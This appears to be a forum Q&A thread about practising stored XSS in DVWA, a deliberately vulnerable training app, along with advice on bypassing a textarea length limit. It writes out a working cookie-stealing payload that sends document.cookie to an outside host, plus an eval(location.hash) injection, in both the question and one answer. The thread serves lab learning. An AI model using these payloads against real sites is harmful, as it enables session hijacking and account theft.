I am learning about xss exploitation with this web app called damn vulnerable web app found here http://www.dvwa.co.uk/ which intentionally contains web vulnerabilities.
I am trying to add javascript in to a message box like this see image
http://postimg.org/image/w6yeoj331/
It only accepts a certain amount of words and then doesn't allow more than that, which doesn't allow me to continue with the xss attack. I am trying to type this in the message box:
<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>
Here is the php script that deals with the message and name text areas
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
It is probably some JavaScript on the page limiting the amount of text you can enter in the textarea - try disabling JavaScript.
You could also try Firebug which will allow you to modify HTML content or JavaScript in the page to remove the length restrictions.
Alternatively you can use an intercepting proxy such as ZAP or Burp Suite to intercept your POST request and then modify the request in the proxy.
Another attack vector could be to use <script>eval(location.hash.substring(1))</script> in the textarea and then add your code in the URL by prefixing with a hash (#).
(e.g. www.example.com/page.php#new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;)
This attack would make the page vulnerable to reflected XSS through use of a stored XSS vulnerability.
this solution worked perfect for me
go to -> C:\XAMPP\htdocs\DVWA-1.0.8\vulnerabilities\xss_s enter to the index.php file using notepad++
ctrl+f and search for textarea, then look at that line for maxlentgh change it from (example -> maxlength=\"50) to what ever you want
best of luck!
1) Right Click the message box and inspect element 2) Change the max character length to 999 3) Press F12